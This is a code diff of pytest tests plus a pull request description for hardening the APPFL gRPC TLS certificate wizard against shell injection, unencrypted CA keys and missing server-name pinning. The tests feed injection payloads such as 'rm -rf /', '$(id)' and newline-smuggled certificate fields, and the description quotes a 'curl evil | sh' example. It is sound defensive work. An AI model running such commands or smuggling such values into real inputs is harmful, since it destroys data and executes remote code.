+        _load_pem_key(ssl_dir / "ca.key", password=b"wrong-passphrase")
+
+
+def test_server_key_is_unencrypted(monkeypatch, tmp_path, env_passphrase):
+    """gRPC has no passphrase callback for ssl_server_credentials, so the
+    server key must remain loadable without a password — only the CA key is
+    encrypted."""
+    ssl_dir = tmp_path / "ssl"
+    _run_setup(monkeypatch, ssl_dir)
+    key = _load_pem_key(ssl_dir / "server.key", password=None)
+    assert key.key_size == 4096
+
+
+def test_ca_password_notsafe_regression_guard():
+    """The 'CA_PASSWORD=notsafe' line was dead in the old bash template and
+    has been removed entirely. Guard against re-introduction."""
+    src = sys.modules["appfl.comm.grpc.setup_ssl"].__file__
+    with open(src) as f:
+        body = f.read()
+    assert "CA_PASSWORD=notsafe" not in body
+    assert "notsafe" not in body
+
+
+def test_unencrypted_opt_out_via_env(monkeypatch, tmp_path):
+    """APPFL_CA_NO_ENCRYPT=1 in a non-interactive run produces a plaintext
+    key and writes a WARNING banner to stderr."""
+    monkeypatch.delenv("APPFL_CA_PASSPHRASE", raising=False)
+    monkeypatch.setenv("APPFL_CA_NO_ENCRYPT", "1")
+    monkeypatch.setattr(setup_ssl_module.sys.stdin, "isatty", lambda: False)
+
+    ssl_dir = tmp_path / "ssl"
+    _run_setup(monkeypatch, ssl_dir)
+
+    key = _load_pem_key(ssl_dir / "ca.key", password=None)
+    assert key.key_size == 4096
+
+
+def test_refuses_unattended_without_passphrase(monkeypatch, tmp_path):
+    """Non-interactive with no passphrase and no APPFL_CA_NO_ENCRYPT must
+    refuse rather than silently writing an unencrypted key."""
+    monkeypatch.delenv("APPFL_CA_PASSPHRASE", raising=False)
+    monkeypatch.delenv("APPFL_CA_NO_ENCRYPT", raising=False)
+    monkeypatch.setattr(setup_ssl_module.sys.stdin, "isatty", lambda: False)
+
+    ssl_dir = tmp_path / "ssl"
     monkeypatch.setattr(
         "builtins.input",
-        _input_feeder([str(good_dir), "", "", "", "", ""]),
+        _input_feeder([str(ssl_dir), *_default_subject_inputs()]),
     )
+    with pytest.raises(RuntimeError, match="refusing"):
+        setup_ssl()
+
+
+# ---------------------------------------------------------------------------
+# #16 — subject-field validation.
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "field_idx,bad_value",
+    [
+        # Country code: must be exactly 2 letters
+        (0, "USA"),
+        (0, "1"),
+        (0, "US; rm -rf"),
+        # State: rejects shell metachars + newlines
+        (1, 'Illinois"; echo x; echo "'),
+        (1, "Illinois\nDNS.2 = evil"),
+        (1, "Illinois\n[dn]\nCN = evil"),
+        # Org: same class
+        (2, "APPFL`id`"),
+        (2, "APPFL$(id)"),
+    ],
+)
+def test_subject_field_rejects_injection(
+    monkeypatch, tmp_path, env_passphrase, capsys, field_idx, bad_value
+):
+    """For each subject field, a bad value must be rejected and the prompt
+    re-asked. The fallback acceptable value finishes the flow.
+
+    Note: an empty input is accepted (it means "use the default") and is not
+    a rejection case — that's tested separately by the happy-path tests.
+    """
+    fallback_subject = _default_subject_inputs()
+    inputs = (
+        [str(tmp_path / "ssl")]
+        + fallback_subject[:field_idx]
+        + [bad_value]
+        + fallback_subject[field_idx:]
+    )
+    monkeypatch.setattr("builtins.input", _input_feeder(inputs))
     setup_ssl()
-    assert (good_dir / "generate_ssl.sh").is_file()
+    out = capsys.readouterr().out
+    assert "Please try again" in out
 
 
-def test_generated_script_mode_is_0700(monkeypatch, tmp_path, stub_openssl):
-    """The generated bash script must be owner-rwx only, regardless of umask."""
-    good_dir = tmp_path / "ssl"
-    monkeypatch.setattr(
-        "builtins.input",
-        _input_feeder([str(good_dir), "", "", "", "", ""]),
+@pytest.mark.parametrize(
+    "bad_dns",
+    [
+        "-foo.example",
+        "foo_bar.example",
+        ".foo.example",
+        "foo..example",
+        "a" * 254,
+        "label-too-long-" + "x" * 60 + ".example",
+        "foo\n[dn]\nCN=evil",
+        "foo; rm",
+    ],
+)
+def test_dns_field_validation(monkeypatch, tmp_path, env_passphrase, capsys, bad_dns):
+    """DNS field rejects RFC-1123-invalid hostnames and injection payloads."""
+    fallback = _default_subject_inputs()
+    # Subject inputs: C, ST, ORG, DNS, IP. DNS is index 3.
+    inputs = [str(tmp_path / "ssl")] + fallback[:3] + [bad_dns] + fallback[3:]
+    monkeypatch.setattr("builtins.input", _input_feeder(inputs))
+    setup_ssl()
+    assert "try again" in capsys.readouterr().out.lower()
+
+
+@pytest.mark.parametrize(
+    "bad_ip",
+    [
+        "999.999.999.999",
+        "127.0.0.1; rm -rf /",
+        "127.0.0.1\nDNS.2 = evil",
+        "localhost",
+    ],
+)
+def test_ip_field_validation(monkeypatch, tmp_path, env_passphrase, capsys, bad_ip):
+    fallback = _default_subject_inputs()
+    # IP is index 4.
+    inputs = [str(tmp_path / "ssl")] + fallback[:4] + [bad_ip] + fallback[4:]
+    monkeypatch.setattr("builtins.input", _input_feeder(inputs))
+    setup_ssl()
+    assert "try again" in capsys.readouterr().out.lower()
+
+
+# ---------------------------------------------------------------------------
+# #9 — multi-SAN and resulting cert validity.
+# ---------------------------------------------------------------------------
+
+
+def test_multi_san_dns_and_ip(monkeypatch, tmp_path, env_passphrase):
+    """Comma-separated DNS and IP inputs land in the cert SAN."""
+    ssl_dir = tmp_path / "ssl"
+    inputs = [
+        str(ssl_dir),
+        "",  # C
+        "",  # ST
+        "",  # ORG
+        "appfl.example.com, alt.example.com, localhost",  # DNS
+        "10.0.0.5, 127.0.0.1",  # IP
+    ]
+    monkeypatch.setattr("builtins.input", _input_feeder(inputs))
+    setup_ssl()
+
+    from cryptography import x509
+
+    with open(ssl_dir / "server.crt", "rb") as f:
+        cert = x509.load_pem_x509_certificate(f.read())
+    san = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName).value
+    assert sorted(san.get_values_for_type(x509.DNSName)) == [
+        "alt.example.com",
+        "appfl.example.com",
+        "localhost",
+    ]
+    assert sorted(str(ip) for ip in san.get_values_for_type(x509.IPAddress)) == [
+        "10.0.0.5",
+        "127.0.0.1",
+    ]
+
+
+def test_server_cert_is_signed_by_ca(monkeypatch, tmp_path, env_passphrase):
+    ssl_dir = tmp_path / "ssl"
+    _run_setup(monkeypatch, ssl_dir)
+
+    from cryptography import x509
+    from cryptography.hazmat.primitives.asymmetric import padding
+
+    with open(ssl_dir / "ca.crt", "rb") as f:
+        ca = x509.load_pem_x509_certificate(f.read())
+    with open(ssl_dir / "server.crt", "rb") as f:
+        leaf = x509.load_pem_x509_certificate(f.read())
+
+    assert leaf.issuer == ca.subject
+
+    # Verify the signature on the leaf was produced by the CA's key.
+    ca.public_key().verify(
+        leaf.signature,
+        leaf.tbs_certificate_bytes,
+        padding.PKCS1v15(),
+        leaf.signature_hash_algorithm,
     )
 
+
+def test_ca_cert_has_basic_constraints_and_key_usage(
+    monkeypatch, tmp_path, env_passphrase
+):
+    ssl_dir = tmp_path / "ssl"
+    _run_setup(monkeypatch, ssl_dir)
+    from cryptography import x509
+
+    with open(ssl_dir / "ca.crt", "rb") as f:
+        ca = x509.load_pem_x509_certificate(f.read())
+    bc = ca.extensions.get_extension_for_class(x509.BasicConstraints).value
+    assert bc.ca is True
+    ku = ca.extensions.get_extension_for_class(x509.KeyUsage).value
+    assert ku.key_cert_sign is True
+    assert ku.crl_sign is True
+
+
+# ---------------------------------------------------------------------------
+# Filesystem hardening.
+# ---------------------------------------------------------------------------
+
+
+def test_file_modes(monkeypatch, tmp_path, env_passphrase):
+    ssl_dir = tmp_path / "ssl"
     old_umask = os.umask(0o022)
     try:
-        setup_ssl()
+        _run_setup(monkeypatch, ssl_dir)
     finally:
         os.umask(old_umask)
+    assert stat.S_IMODE(os.stat(ssl_dir).st_mode) == 0o700
+    for name in ("ca.key", "server.key"):
+        m = stat.S_IMODE(os.stat(ssl_dir / name).st_mode)
+        assert m == 0o600, f"{name}: expected 0o600, got {oct(m)}"
+    for name in ("ca.crt", "server.crt"):
+        m = stat.S_IMODE(os.stat(ssl_dir / name).st_mode)
+        assert m == 0o644, f"{name}: expected 0o644, got {oct(m)}"
 
-    script = good_dir / "generate_ssl.sh"
-    mode = stat.S_IMODE(script.stat().st_mode)
-    assert mode == 0o700, f"expected 0o700, got {oct(mode)}"
 
+def test_refuses_symlink_at_ssl_dir(monkeypatch, tmp_path, env_passphrase, capsys):
+    """If the target ssl_dir is a symlink, refuse rather than follow it."""
+    real_target = tmp_path / "real"
+    real_target.mkdir(mode=0o700)
+    symlink_dir = tmp_path / "via-symlink"
+    os.symlink(real_target, symlink_dir)
 
-def test_surfaces_oserror(monkeypatch, tmp_path, stub_openssl, capsys):
-    """An unwritable ssl_dir must surface the underlying OSError message
-    (no more silent bare-except)."""
-    unwritable = tmp_path / "readonly"
-    unwritable.mkdir()
-    unwritable.chmod(0o500)  # r-x for owner, no write
-
-    target = unwritable / "ssl"  # mkdir will fail with PermissionError
-    good = tmp_path / "good"
-
+    good_dir = tmp_path / "ssl"
     monkeypatch.setattr(
         "builtins.input",
-        _input_feeder([str(target), str(good), "", "", "", "", ""]),
+        _input_feeder([str(symlink_dir), str(good_dir), *_default_subject_inputs()]),
     )
-
-    try:
-        setup_ssl()
-    finally:
-        unwritable.chmod(0o700)
-
+    setup_ssl()
     out = capsys.readouterr().out
-    assert "Invalid directory" in out
-    # The new code includes the underlying exception in the message
-    assert "Permission denied" in out or "permission" in out.lower()
+    assert "symlink" in out.lower() or "Invalid directory" in out
+    assert good_dir.is_dir()
+
+
+def test_refuses_group_writable_ssl_dir(monkeypatch, tmp_path, env_passphrase, capsys):
+    bad = tmp_path / "loose"
+    bad.mkdir(mode=0o770)
+    os.chmod(bad, 0o770)
+    good = tmp_path / "ssl"
+    monkeypatch.setattr(
+        "builtins.input",
+        _input_feeder([str(bad), str(good), *_default_subject_inputs()]),
+    )
+    setup_ssl()
+    out = capsys.readouterr().out
+    assert (
+        "group" in out.lower()
+        or "world-writable" in out.lower()
+        or "Invalid directory" in out
+    )
     assert good.is_dir()


### PR DESCRIPTION
## Summary

Three related gRPC-TLS hardening changes shipped together because they share files (`setup_ssl.py`, `channel.py`, `serve.py`) and would otherwise textually conflict:

1. **Shell injection through the certificate-subject prompts in `appfl-setup-ssl`.** The wizard asks the operator for five X.509 subject fields — country code (`C`), state (`ST`), organisation (`ORG`), DNS name (`DNS`), and IP address (`IP`) — and pastes those answers verbatim into a Bash script that it then executes. Because nothing checked the values, an answer containing shell metacharacters could break out of the surrounding quoting and run arbitrary commands as the operator. For example, typing `APPFL"; curl evil | sh; echo "` at the `ORG` prompt would download and execute a remote shell script at the exact moment the CA private key was being generated — and it would run with whatever permissions the operator running `appfl-setup-ssl` had. A previous patch fixed the same class of bug for the directory-path prompt, but the five subject-field prompts were left unvalidated.
2. **Unencrypted CA private key.** `openssl genrsa` was invoked with no `-aes256`, so `ca.key` landed on disk as a plaintext PKCS#1 key. Anyone who could read it could mint server or client certificates for any identity in the federation.
3. **No server-identity verification on the client.** `create_grpc_channel` did not pass `ssl_target_name_override`, did not expose any `server_hostname` field on the client communicator, and never validated the bind URI against the cert's SubjectAlternativeName (SAN). Any certificate chaining to the configured CA was accepted regardless of subject — so an attacker who had obtained *any* leaf cert from the same CA could complete a TLS handshake under any identity.

## What changed

### `src/appfl/comm/grpc/setup_ssl.py` — full rewrite

- Replaced the `f"""…"""` Bash template + `subprocess.run([script_file])` with a direct `cryptography`-library implementation. There is no shell, no `openssl` binary dependency, and no script-write/exec TOCTOU window.
- Per-field input validation:
  - `C`: ISO 3166-1 alpha-2 (two letters, uppercased).
  - `ST`, `ORG`: `[A-Za-z0-9 .,'_-]{1,64}` — printable ASCII, no shell metacharacters, no newlines, no `[` (which would otherwise split X.509 attributes), no quote.
  - `DNS`: RFC 1123-ish hostname regex (labels 1–63 chars, total ≤253, no leading/trailing dash, underscores rejected).
  - `IP`: `ipaddress.ip_address()` round-trip — rejects `999.999.999.999`, `127.0.0.1; rm`, `127.0.0.1\nDNS.2 = evil`, `localhost`.
  - DNS and IP prompts now accept comma-separated lists, producing a single server certificate covering multiple SAN entries.
- CA private key encryption:
  - Prompts for a passphrase via `getpass.getpass` (twice, with confirmation) when on a TTY; falls back to `APPFL_CA_PASSPHRASE` env var for scripted runs. PKCS#8 with `BestAvailableEncryption` (AES-256-CBC + PBKDF2 + SHA-256). Minimum interactive passphrase length: 12.
  - Non-interactive runs without a passphrase refuse to proceed unless `APPFL_CA_NO_ENCRYPT=1` is set; in that case a multi-line WARNING banner is written to stderr.
  - Interactive runs that enter an empty passphrase require a literal "yes" confirmation before producing an unencrypted key.
  - `server.key` remains unencrypted because gRPC has no passphrase callback for `ssl_server_credentials`. Only the CA key is encrypted, which matches the threat model: the passphrase is needed at **provisioning** time, not at runtime, so unattended restarts continue to work.
- Filesystem hardening:
  - `ssl_dir` created `0o700` (with an explicit `chmod` to defeat the umask).
  - Key files written via `O_NOFOLLOW`-opened fds at `0o600`; cert files at `0o644`.
  - Refuses to use an `ssl_dir` that is a symlink, or group/world writable.
  - Symlinks inside `ssl_dir` are removed via `os.unlink` after `os.lstat`, never followed.
- X.509 hygiene:
  - CA cert grew `BasicConstraints(CA=True, path_length=0)` (critical), `KeyUsage(keyCertSign, cRLSign)` (critical), and `SubjectKeyIdentifier`. Modern gRPC builds reject CAs without `BasicConstraints`.
  - Server cert carries `BasicConstraints(CA=False)`, `KeyUsage(digital_signature, key_encipherment)`, `ExtendedKeyUsage(SERVER_AUTH)`, plus `SubjectKeyIdentifier` and `AuthorityKeyIdentifier`.
  - CA lifetime 3650 days; leaf lifetime 825 days (CA/Browser Forum max).
- Deleted the dead `CA_PASSWORD=notsafe` line and the entire Bash template.
- Run output now prints the exact `server_hostname` value clients must pin, and the full list of SAN entries on the cert.

### `src/appfl/comm/grpc/channel.py` — pin the server identity

- Added `server_hostname: Optional[str] = None` kwarg. Required when `use_ssl=True`; passed through to gRPC as
  `("grpc.ssl_target_name_override", server_hostname)`.
- Added `_validate_server_hostname` — accepts RFC-1123 hostnames, IPv4, and IPv6 literals; rejects empty, wildcards, underscores, shell metachars.
- Added `insecure_skip_server_identity_check: bool = False`. When `True`, emits both a `UserWarning` and a logger WARNING and allows the channel with no SAN pin. The chain is still verified against `root_certificate`.
- Added `allow_uri_hostname_mismatch: bool = False`. When `server_uri`'s authority is a DNS name that differs from `server_hostname`, the channel is refused at construction time unless this opt-in is set. Catches the common "URI is `internal-lb.corp`, cert SAN is `appfl.corp`" mistake at startup instead of at attack time.
- IP-literal URIs continue to work — only DNS-named URIs are coherence-checked against `server_hostname`.

### `src/appfl/comm/grpc/grpc_client_communicator.py`

- Threaded the three new kwargs through `__init__` and into `create_grpc_channel`. Documented in the docstring.

### `src/appfl/comm/grpc_legacy/channel.py`

- Mirror of the channel-side fix. Imports the validator helpers from the active `grpc/channel.py` to avoid duplicating regex logic.

### `src/appfl/comm/grpc/serve.py`

- New `_warn_if_bind_uri_not_covered_by_san()` helper. After loading `server_certificate`, log a WARNING if the bind URI host is not covered by any DNS or IP SAN entry. Advisory only; the client-side pin is the enforcement.

### Documentation

- `src/appfl/comm/grpc/credentials/ReadME.md` — rewritten to describe the passphrase prompt, env var, multi-SAN inputs, `server_hostname` requirement, and rotation procedure.
- `docs/tutorials/examples_ssl.rst` — updated wizard transcript, removed the "you need `openssl` installed" note, added the `server_hostname` field to the example client YAML with a note explaining why it is required.
- `examples/resources/configs/mnist/client_{1,2}_gloubs_auth.yaml` — added `server_hostname: localhost` so the shipped example remains runnable.

## Tests

`.conda/bin/python -m pytest tests/test_setup_ssl.py tests/test_grpc_tls.py -q` runs **70 tests in ~45 s**, all passing. Plain pytest, no MPI, no network beyond loopback for the TLS handshake tests.

### `tests/test_setup_ssl.py` (44 tests, rewritten)

- Regression: existing metachar guards on `ssl_dir` (`;`, `|`, `&`, ``` ` ```, `$()`, `\n`, glob chars, whitespace, redirect).
- `test_no_shell_invocation` — patches `os.system` and asserts `subprocess` is not even imported by the module. Guards against re-introducing the shell path.
- `test_ca_password_notsafe_regression_guard` — greps the source for the literal `notsafe` and asserts it is absent.
- `test_ca_key_requires_passphrase` / `test_ca_key_wrong_passphrase_rejected` — load via `serialization.load_pem_private_key` with `password=None`, `b"wrong"`, and the correct passphrase; assert the expected raises.
- `test_server_key_is_unencrypted` — server key must remain loadable without a password (gRPC requirement).
- `test_unencrypted_opt_out_via_env` — `APPFL_CA_NO_ENCRYPT=1` in non-TTY context produces a plaintext key.
- `test_refuses_unattended_without_passphrase` — non-interactive with no passphrase and no opt-out raises `RuntimeError` rather than silently writing a plaintext key.
- Parametrized injection-payload tests across `C`, `ST`, `ORG`, `DNS`, `IP`.
- `test_multi_san_dns_and_ip` — comma-separated lists land in the cert SAN.
- `test_server_cert_is_signed_by_ca` — verifies the leaf signature against the CA public key.
- `test_ca_cert_has_basic_constraints_and_key_usage` — asserts the new extensions are present and critical.
- File-mode tests under explicit `umask(0o022)` (`ssl_dir=0o700`, `*.key=0o600`, `*.crt=0o644`).
- `test_refuses_symlink_at_ssl_dir`, `test_refuses_group_writable_ssl_dir`.

### `tests/test_grpc_tls.py` (26 tests, new)

- 16 unit tests for `_validate_server_hostname` (positive + negative cases).
- 7 unit tests for `create_grpc_channel` argument handling, using a fake grpc fixture that records calls but opens no sockets:
  - missing `server_hostname` under TLS raises
  - `ssl_target_name_override` is added to the channel options when pinned
  - IP-literal URI + DNS `server_hostname` accepted
  - DNS URI / `server_hostname` mismatch refused; opt-in restores it
  - bypass flag works and emits a `UserWarning`
  - invalid `server_hostname` (wildcard, underscore) rejected
  - insecure channel path unchanged
- 2 live TLS handshake tests against an ephemeral `grpc.server`:
  - Server cert SAN matches `server_hostname=localhost` → handshake succeeds.
  - Server cert SAN is `other.example.com`, client pins `localhost` → handshake fails (`grpc.FutureTimeoutError`/`grpc.RpcError`), no application data exchanged.

The live tests mint ephemeral CA + leaf certs with `cryptography` in a `tmp_path`, so the suite stays hermetic and needs no openssl binary.

### Backward compatibility / regression

- Full non-MPI test suite: **119 passed in 43 s**.
- MPI suite: **1 passed, 7 skipped** (unchanged; SSL changes don't touch MPI).
- Lint: `ruff check` clean, `ruff format` clean, `flake8 --select=E9,F63,F7` clean.

## Breaking changes

- **Operators with existing `~/.appfl/ssl/ca.key` files** can keep using them, but to gain the new at-rest protection should run:
  ```bash
  openssl pkcs8 -topk8 -v2 aes-256-cbc -in ca.key -out ca.key.enc
  mv ca.key.enc ca.key
  ```
- **Clients with `use_ssl: True` configs must add `server_hostname`** — this is the only behaviour change visible to existing users. The error message names the field and points at `appfl-setup-ssl`'s new output banner. The shipped TLS-enabled YAMLs under `examples/` have already been updated.
- Anyone scripting `appfl-setup-ssl` non-interactively must now provide either `APPFL_CA_PASSPHRASE` or `APPFL_CA_NO_ENCRYPT=1`. Existing interactive operators see one extra prompt.

## Out of scope / follow-ups

- The `OmegaConf` config schema does not validate `server_hostname` at config-load time (it is validated by `_validate_server_hostname` at channel construction). Tightening the schema is a natural follow-up.
- The insecure-by-default gRPC channel (`use_ssl=False`) is unchanged here; this PR makes the TLS path actually enforce identity so a later default-flip becomes safe to make.

## Test plan (for reviewer)

- [ ] `pytest tests/test_setup_ssl.py tests/test_grpc_tls.py`
- [ ] `pytest tests/ --ignore=tests/test_mnist.py`
- [ ] `mpirun -n 2 .conda/bin/python -m pytest --with-mpi tests/test_mnist.py`
- [ ] `appfl-setup-ssl` interactively — confirm the prompts, the passphrase flow, the printed `server_hostname` block, and that files land at the expected modes.
- [ ] `APPFL_CA_PASSPHRASE=… appfl-setup-ssl < scripted_answers.txt` — confirm scripted mode works.
- [ ] `APPFL_CA_NO_ENCRYPT=1 appfl-setup-ssl < scripted_answers.txt` — confirm the WARNING banner appears on stderr.
- [ ] Verify a `use_ssl: True` config without `server_hostname` now errors out at agent construction with the new message.